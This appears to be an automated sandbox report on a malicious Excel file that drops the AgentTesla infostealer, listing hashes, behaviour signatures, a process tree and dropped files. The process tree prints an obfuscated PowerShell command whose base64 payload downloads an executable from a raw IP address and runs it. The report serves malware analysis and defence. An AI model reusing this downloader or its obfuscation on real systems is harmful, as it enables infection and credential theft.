Analysis

  • max time kernel
    121s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/07/2024, 09:55

General

  • Target

    5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls

  • Size

    118KB

  • MD5

    b363a9de28fa08d52fd1bcbe66b62177

  • SHA1

    4d76d82d397c088d68038414bcc945c7e62fef9f

  • SHA256

    5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d

  • SHA512

    ecbc3d03d4c30a1d85ecbde1fdbc262c41e90743117d9f407676eaf03ee61fdd227699e4b4adcbc0aa15856b1c85dee5f2fd66548aa96c9f56306da424fe670c

  • SSDEEP

    1536:HtZjb5CNvDUyPILbqcH1pxt3HrsbDMTXLMEBun3OJdvc3hZPGgqGa:HPj9cgBbq6xtXIbYwEQ3OnvWHPG

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3048
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'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'+[chAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp"
            5⤵
            PID:1732
          • C:\Users\Admin\AppData\Roaming\winiti.exe
            "C:\Users\Admin\AppData\Roaming\winiti.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1044
            • C:\Users\Admin\AppData\Roaming\winiti.exe
              "C:\Users\Admin\AppData\Roaming\winiti.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2432

Network

MITRE ATT&CK Enterprise v15


Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK27LCMU\bqrp4j[1].htm

      Filesize

      75B

      MD5

      f5aa5c15ce9558011d53a5b7700f8209

      SHA1

      082c8304d8093782c6036151672e903e0715a869

      SHA256

      8f2b99b41702d67ec68678a193cf21e7be375e6f8552b3673d4b8adf3cd86fe9

      SHA512

      530dc5cf8f0b5b2988aa35e91dc35995a434dc8e82bbacea5635c5cb876e0b8cc1596300327cf6d495acd27b10cc366c5ce152033aa9cb2d929efe5a7810805a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2D3H3V6\bqrp4j[1].htm

      Filesize

      168B

      MD5

      d57e3a550060f85d44a175139ea23021

      SHA1

      2c5cb3428a322c9709a34d04dd86fe7628f8f0a6

      SHA256

      43edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c

      SHA512

      0364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063

    • C:\Users\Admin\AppData\Local\Temp\8up2kuy1.dll

      Filesize

      3KB

      MD5

      205e27169156054632cc11269357c59c

      SHA1

      c4c9b6100486e022c8778b71573c6621d21e1ed8

      SHA256

      ff5ba91a96c64607e62146c1cd4a2a7b66a0633b00e0ec8037603030feffcf12

      SHA512

      30f7939ce8377eb3cbc9b69fe665024f3c454a343bd5c5f96983ff41491b6224d46cfa47e3dd561ca5825a81854d187b41069dd08c9f84cce85fb4c051625505

    • C:\Users\Admin\AppData\Local\Temp\8up2kuy1.pdb

      Filesize

      7KB

      MD5

      2ec3684debec23ce3620a183635b6e1e

      SHA1

      83ee7ea91d4cb875f41e0806d085a7f313ea9b34

      SHA256

      6e6d1ece8e3d1495752af7121c0583a70c7c75f64a4f781b061313862e629751

      SHA512

      051867259773a466dd1837b07fc53d345d18bc24c7860bf718ef951266f6806758682c541282e48fd964be3385070c3a726935bb73699d5bd5b917de2119c0f4

    • C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp

      Filesize

      1KB

      MD5

      8c5ef15d9ff9a902c87ce02dc3b53bc8

      SHA1

      47e203a63ae42cc9e089babcad96c938232ffe7a

      SHA256

      5c70642b95a26f7d5bca2432ea24ee7b41f2eacbdab6a7ae0e303f9fbe2915aa

      SHA512

      5abde99629f366ac9315d174319498fb51e9dd856a7ff89fc7215b0f3e94c2dac402c510ad21bf0a2a4774e652863efa63aa51e68e517e4f57cf45d0a29b6162

    • C:\Users\Admin\AppData\Roaming\winiti.exe

      Filesize

      906KB

      MD5

      f077adcb2d6ea5208dc2b37f94d21fc8

      SHA1

      2fd52d3fb6b982bb64afd1165836f911ac82a40e

      SHA256

      6af79d96f93fecf5182be2b0dbadb8a0874fb4bcdded73478252ccec2f48f05f

      SHA512

      81a3b1416e9780b2c25ab381742ebac09200932d7b21fd8546f4d455439e5c1bbdac7c3faff9f48945064c04b941d1c237dba55d53687445d456a855bce0dd07

    • \??\c:\Users\Admin\AppData\Local\Temp\8up2kuy1.0.cs

      Filesize

      468B

      MD5

      7734075c50835dd0aa579997b1feacfd

      SHA1

      b2b42485dfcf88999d6780c0f1aa88e638081515

      SHA256

      9ef8ccd491530f4be74ad14c37d6c10b340045ac58c8bf65cc41c0766552a0e3

      SHA512

      0350ef6f6c01260409dbda7da5a3873b5ee760d02c93c98cb8b6415685b5a4d37013b5c0822e8b85a85b8d14df7224a9b9d3f7d1145330f795a7c9be682ae82e

    • \??\c:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline

      Filesize

      309B

      MD5

      b8846de9d7dc1ad32e3cdd3b70cda506

      SHA1

      eaba4994e87638e36e64b1d8ae40ab82acc3de2e

      SHA256

      23679c623b8659c2300cbb1af381d95bbac3b204a3975c7c83ca44abc8d94f9a

      SHA512

      9f3d460b553826850a3ef2eed873f5529840878f7eba19bd12f2d7d0d3fc12a39cab1c93bf3f2a8ff4dcab6b62fce5c589ccfc30d953fc1c3fa9d2267a97620e

    • \??\c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp

      Filesize

      652B

      MD5

      28fd46d577ed4f3e89d0718c11e4d23e

      SHA1

      0bdce8b570158912d1202cd7ae688d6a1a7e7235

      SHA256

      bc73dbc0d4d46ea14bd657a14561b06a6d3f8b1b89c3857fe80b96eab2bc78f7

      SHA512

      d80340864cbb27a0d6b9180d9955a66a09825dd7cb160058d4f832b74cc27465e9b4fb22346ec43df56644c7457d4aede85d13c03b56dc2e7d0f7d119c69ae89

    • memory/1044-53-0x00000000056C0000-0x0000000005790000-memory.dmp

      Filesize

      832KB

    • memory/1044-54-0x0000000000630000-0x000000000064A000-memory.dmp

      Filesize

      104KB

    • memory/1044-56-0x0000000005790000-0x0000000005814000-memory.dmp

      Filesize

      528KB

    • memory/1044-55-0x0000000000810000-0x000000000081E000-memory.dmp

      Filesize

      56KB

    • memory/1044-52-0x00000000008C0000-0x00000000009A8000-memory.dmp

      Filesize

      928KB

    • memory/2432-63-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-65-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2432-69-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-59-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-57-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-68-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-66-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-61-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2860-18-0x00000000022B0000-0x00000000022B2000-memory.dmp

      Filesize

      8KB

    • memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3048-19-0x00000000025F0000-0x00000000025F2000-memory.dmp

      Filesize

      8KB

    • memory/3048-1-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB

    • memory/3048-70-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB

    • memory/3048-73-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3048-76-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB